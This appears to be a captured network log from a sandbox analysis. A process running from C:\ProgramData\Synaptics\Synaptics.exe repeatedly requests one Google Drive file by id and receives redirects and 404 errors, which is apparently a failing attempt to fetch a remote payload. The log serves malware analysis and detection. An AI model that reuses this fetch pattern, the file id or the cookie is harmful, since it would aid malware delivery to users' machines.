                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:32 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5zNxRd2FZz7q2nYkKsSu9LoSiiOMsDs0Qn_5xLE6tLAXIcEgi9gQvjY0vhm9gEDcHt
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2WIm3q_OXsY1STAuL6t_gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:32 UTC | 147 | IN
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:32 UTC | 1390 | IN
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="npMkWTbWL3cOkRxeY56tCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:32 UTC | 115 | IN
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.7 | 50107 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:31 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:31 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ZFRLERiJNUk3_tW0lMCtjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.7 | 50109 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:31 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:32 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6ZJtHK0kXHSAbONHcd2Aj41th3nrdAk60F-GSqsveAVAxMfvRqVLbTQ0xWjMDiEUBf1UymHYk
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-AxGsGedNodCh4Yi30VNLCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:32 UTC | 140 | IN
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:32 UTC | 1390 | IN
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="HhXNmiC2k-Y1UROeenqkGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:32 UTC | 122 | IN
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.7 | 50108 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:31 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:31 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_GX7so5w_PGSCJ2DgDi_rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.7 | 50112 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:32 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gSlIIJqC4YpQdEllZ-O8SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.7 | 50111 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:32 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:32 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DgztvnSftBmGnf7Z-3FOYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.7 | 50114 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:32 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:33 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4R2GpV991AhRbKqc6ICKlzZU2qexi5lCWOHYFd0eXG9PX3SEhTbwgkhRK8LpWGE5tXt89FTf4
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:33 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7JtuJjg9kPR51QbTWyN2Ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:33 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:33 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="rTLBSXvVDjhuALX9znttUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:33 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.7 | 50113 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:32 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:33 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7x5jloO1fPXoo9HMImHXRcaftSeG47HoDh46372HnTzuleZrj_ele8bFIjbnWdEssNeA3jXq0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:33 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_fNPlzqxrP4WsNjS6AsQiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:33 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:33 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="FzAmSQt4krxT4MyD5AkLQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:33 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.7 | 50119 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:33 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-sQlmecGqrHDFPGxzh4XyDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.7 | 50118 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:33 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qjKuJ4jZWG5t7TvINSGY2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
